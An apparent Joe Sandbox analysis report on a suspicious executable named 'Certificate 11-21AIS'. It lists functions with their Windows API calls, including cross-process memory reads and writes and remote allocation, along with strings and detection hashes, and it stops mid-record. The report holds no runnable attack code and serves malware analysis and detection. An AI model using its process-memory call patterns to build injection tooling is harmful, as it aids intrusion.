                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper$__itow__swprintf
                                                                              • String ID: REMOVE$THIS
                                                                              • API String ID: 3797816924-776492005
                                                                              • Opcode ID: 38d692664ac2780bf3976b26c2f2d6f29b067fedc46af9ae9fbcf797ff6fdf21
                                                                              • Instruction ID: 6baedc75a1d00fce68fd1e2f48d3dfc7667f1f86025efb170a1a9176c21c20d2
                                                                              • Opcode Fuzzy Hash: 38d692664ac2780bf3976b26c2f2d6f29b067fedc46af9ae9fbcf797ff6fdf21
                                                                              • Instruction Fuzzy Hash: DE417274A002199FCF01EF68C885AADB7B9FF45304F148459EA16EB3A2DB34DD45CB51
                                                                              Function 008FC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0090430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008FBC08,?,?,00000034,00000800,?,00000034), ref: 00904335
                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 008FC1D3
                                                                                • Part of subcall function 009042D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008FBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00904300
                                                                                • Part of subcall function 0090422F: GetWindowThreadProcessId.USER32(?,?), ref: 0090425A
                                                                                • Part of subcall function 0090422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,008FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 0090426A
                                                                                • Part of subcall function 0090422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,008FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00904280
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008FC240
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008FC28D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                              • String ID: @
                                                                              • API String ID: 4150878124-2766056989
                                                                              • Opcode ID: a2b4bfb5ae4e2bfee4483f089c64a1aecad9669f9f35bd68213ec5a023a64679
                                                                              • Instruction ID: 21394263ef5336fd1add2aba69bdffc2a455a5f69bbf06a2464efca9d0c894b3
                                                                              • Opcode Fuzzy Hash: a2b4bfb5ae4e2bfee4483f089c64a1aecad9669f9f35bd68213ec5a023a64679
                                                                              • Instruction Fuzzy Hash: 874139B6A0021CAEDB10DBA8CD81BEEB7B8FB49300F004095FA55B7181DA71AF45DB61
                                                                              Function 0092A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0095DC00,00000000,?,?,?,?), ref: 0092A6D8
                                                                              • GetWindowLongW.USER32 ref: 0092A6F5
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0092A705
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long
                                                                              • String ID: SysTreeView32
                                                                              • API String ID: 847901565-1698111956
                                                                              • Opcode ID: 6202284f2328beb763fc010c107a59cc2d2a36873d31cbd1d571b9ad3b767773
                                                                              • Instruction ID: 37387fed2e38ee386937869fd0a0e3842423f38999db080bcd37cbf3bb835b10
                                                                              • Opcode Fuzzy Hash: 6202284f2328beb763fc010c107a59cc2d2a36873d31cbd1d571b9ad3b767773
                                                                              • Instruction Fuzzy Hash: 7131DE36601216AFDB218E38EC45BEA77ADFB49324F244729F875D32E0D730E8509B95
                                                                              Function 0092A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0092A15E
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0092A172
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0092A196
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window
                                                                              • String ID: SysMonthCal32
                                                                              • API String ID: 2326795674-1439706946
                                                                              • Opcode ID: a5e285c7ff0e4e424dd30d09b2ccedfe9359c978792e8c76cdc57a928e37a303
                                                                              • Instruction ID: ea93c6cbba2a868cc755001944b0f01f4ca8d78d785481a41e024008279356b1
                                                                              • Opcode Fuzzy Hash: a5e285c7ff0e4e424dd30d09b2ccedfe9359c978792e8c76cdc57a928e37a303
                                                                              • Instruction Fuzzy Hash: A721BF33510228BBDF158F94DC82FEA3B79EF48724F110214FA55AB1D1D6B5AC51DB90
                                                                              Function 0092A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0092A941
                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0092A94F
                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0092A956
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyWindow
                                                                              • String ID: msctls_updown32
                                                                              • API String ID: 4014797782-2298589950
                                                                              • Opcode ID: 47905c4bf2ccd03eb8990abf67c7527bc47602472d116a8a6e90dfb7673ca4b3
                                                                              • Instruction ID: 6c9697b340f2f31847e8d87377a877bc0c166520f59d4124b7a9c2ce5b0d45c5
                                                                              • Opcode Fuzzy Hash: 47905c4bf2ccd03eb8990abf67c7527bc47602472d116a8a6e90dfb7673ca4b3
                                                                              • Instruction Fuzzy Hash: 882190BA600219AFDB10DF29DC91D6737ADEB5A3A4B050059FA049B3A1DB30EC52DB61
                                                                              Function 009299A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00929A30
                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00929A40
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00929A65
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MoveWindow
                                                                              • String ID: Listbox
                                                                              • API String ID: 3315199576-2633736733
                                                                              • Opcode ID: 4eb1b551be12c871869c67641be81237dd2ede69d4ab43d19df0f17eb86aa7d3
                                                                              • Instruction ID: 8d7d0a4a7475c6088847d85158ca44d8317017790840da73f07fcb28f90105d0
                                                                              • Opcode Fuzzy Hash: 4eb1b551be12c871869c67641be81237dd2ede69d4ab43d19df0f17eb86aa7d3
                                                                              • Instruction Fuzzy Hash: AB210432610228BFDF218F54EC85FBB3BAEEF8A760F018129F9459B190C6719C51C7A0
                                                                              Function 0092A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0092A46D
                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0092A482
                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0092A48F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: msctls_trackbar32
                                                                              • API String ID: 3850602802-1010561917
                                                                              • Opcode ID: 2c88ee2fb2569ab597a9e2e1366116e63ea458f766a304d743c4d5ebe53e2dd2
                                                                              • Instruction ID: 1f0c96d17d86660baca0bbb1cee342136203171bea9e6804b012278d9a633c01
                                                                              • Opcode Fuzzy Hash: 2c88ee2fb2569ab597a9e2e1366116e63ea458f766a304d743c4d5ebe53e2dd2
                                                                              • Instruction Fuzzy Hash: AE11E772210218BFEF205F65DC45FAB376DEF89754F014218FA45960A1D2B1E811D720
                                                                              Function 008E2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,008E2350,?), ref: 008E22A1
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 008E22A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RoInitialize$combase.dll
                                                                              • API String ID: 2574300362-340411864
                                                                              • Opcode ID: 0e10c048b0c24e550501c79526c22d1449bf08b71e85afdb1e3b795118894578
                                                                              • Instruction ID: 3dc850210814deec58a0561d9cdb37fa8452a4997b17e91a7547c65eff949164
                                                                              • Opcode Fuzzy Hash: 0e10c048b0c24e550501c79526c22d1449bf08b71e85afdb1e3b795118894578
                                                                              • Instruction Fuzzy Hash: D5E04F786BD300ABDB905F71EC4EF1A3668BB82716F004428F202D71E0DBB84088EF08
                                                                              Function 008E235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008E2276), ref: 008E2376
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 008E237D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RoUninitialize$combase.dll
                                                                              • API String ID: 2574300362-2819208100
                                                                              • Opcode ID: 4bb90ce31df30661c6b8bb6c3abab07789e448822e87caae8b8bb7588f48f199
                                                                              • Instruction ID: ec7c154e71d98a4482974bc02c3d06b500b7889bfc5072180b685991759cd2af
                                                                              • Opcode Fuzzy Hash: 4bb90ce31df30661c6b8bb6c3abab07789e448822e87caae8b8bb7588f48f199
                                                                              • Instruction Fuzzy Hash: 6AE0B67966E700ABDB615F61ED0DF053A6AB786B16F100454F109D22B0CBB89448EB14
                                                                              Function 0093AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LocalTime__swprintf
                                                                              • String ID: %.3d$WIN_XPe
                                                                              • API String ID: 2070861257-2409531811
                                                                              • Opcode ID: 6f94520efe7d6947de6e5696ca7053cdfddedff165acf9d155d76a9af7d0433c
                                                                              • Instruction ID: d51c48047bd2bcc9f435822f100db375e3d1335788ac5ab74321ac1e16365716
                                                                              • Opcode Fuzzy Hash: 6f94520efe7d6947de6e5696ca7053cdfddedff165acf9d155d76a9af7d0433c
                                                                              • Instruction Fuzzy Hash: C0E0ECB2804618ABCA5097508D05DF973BCA704741F105892F986E1105D6399B94AE12
                                                                              Function 008C42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,008C42EC,?,008C42AA,?), ref: 008C4304
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008C4316
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-1355242751
                                                                              • Opcode ID: 6704f55e9b3e5073255df892394aa5819afeb5d249e54ff22a30446420a86181
                                                                              • Instruction ID: 7900d83ef0c58a02ccb2f292944b1ac12cf4aa61bc6e1629d056a82b9c7c2e6f
                                                                              • Opcode Fuzzy Hash: 6704f55e9b3e5073255df892394aa5819afeb5d249e54ff22a30446420a86181
                                                                              • Instruction Fuzzy Hash: 96D05E39618B129EC7244B31EC08F0176E4EB49305B00841DA946D2260E6B0C8808610
                                                                              Function 00922205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,009221FB,?,009223EF), ref: 00922213
                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00922225
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetProcessId$kernel32.dll
                                                                              • API String ID: 2574300362-399901964
                                                                              • Opcode ID: 6c10e373f93b6833eeeb0feed7b1bc386fe8858ee8c54a6423579fba815c6ff3
                                                                              • Instruction ID: 4de12ce911d5dbcd76f61300bc70631284839daa0a28c43941bb00ecb5d062cf
                                                                              • Opcode Fuzzy Hash: 6c10e373f93b6833eeeb0feed7b1bc386fe8858ee8c54a6423579fba815c6ff3
                                                                              • Instruction Fuzzy Hash: F7D0A73D518722EFC7294F30F808A0176D8EF09304B008419FC55E2150E771D880D750
                                                                              Function 008C434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,008C41BB,008C4341,?,008C422F,?,008C41BB,?,?,?,?,008C39FE,?,00000001), ref: 008C4359
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008C436B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-3689287502
                                                                              • Opcode ID: 908cc75a6a710e5877885e78311c1f57c941a78a4307cb5241e299f787a8f01a
                                                                              • Instruction ID: 562dc6ac929e8a83ddf1b35db457ab8529e655d887d71befa090f372e5bdb1ff
                                                                              • Opcode Fuzzy Hash: 908cc75a6a710e5877885e78311c1f57c941a78a4307cb5241e299f787a8f01a
                                                                              • Instruction Fuzzy Hash: 4AD0A739518B129FC7244F30E808F0276E4FF5571DB10C41DE885D2250E7B0D8C0C710
                                                                              Function 00900539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,?,0090051D,?,009005FE), ref: 00900547
                                                                              • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00900559
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                              • API String ID: 2574300362-1071820185
                                                                              • Opcode ID: 0c14006f68d385a43d4de51e2579cf9f0f9e1c4be8216ff15fbfffb5439b9e19
                                                                              • Instruction ID: feb4ebecb9e771a77d61451c176939cb069eaa3951489690fdd6904de538ea23
                                                                              • Opcode Fuzzy Hash: 0c14006f68d385a43d4de51e2579cf9f0f9e1c4be8216ff15fbfffb5439b9e19
                                                                              • Instruction Fuzzy Hash: 1ED0A77952C7129FC7208F31EC08B0176E8AB45705F10C41DF8CAD3190E670C880CA10
                                                                              Function 00900564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0090052F,?,009006D7), ref: 00900572
                                                                              • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00900584
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                              • API String ID: 2574300362-1587604923
                                                                              • Opcode ID: 4890763dee8dcbfd7fa83c734ae48846b49244cce58d95d8a591403138de672b
                                                                              • Instruction ID: 2bd30f91b4f93268ce86056fed5fde15b00f3ceaadb310e87b64f74636cb6d67
                                                                              • Opcode Fuzzy Hash: 4890763dee8dcbfd7fa83c734ae48846b49244cce58d95d8a591403138de672b
                                                                              • Instruction Fuzzy Hash: D6D05E3A5283129EC7205F31AC09F027BF8AB89314F108419FC45A2290E670C4808B20
                                                                              Function 0091ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0091ECBE,?,0091EBBB), ref: 0091ECD6
                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0091ECE8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
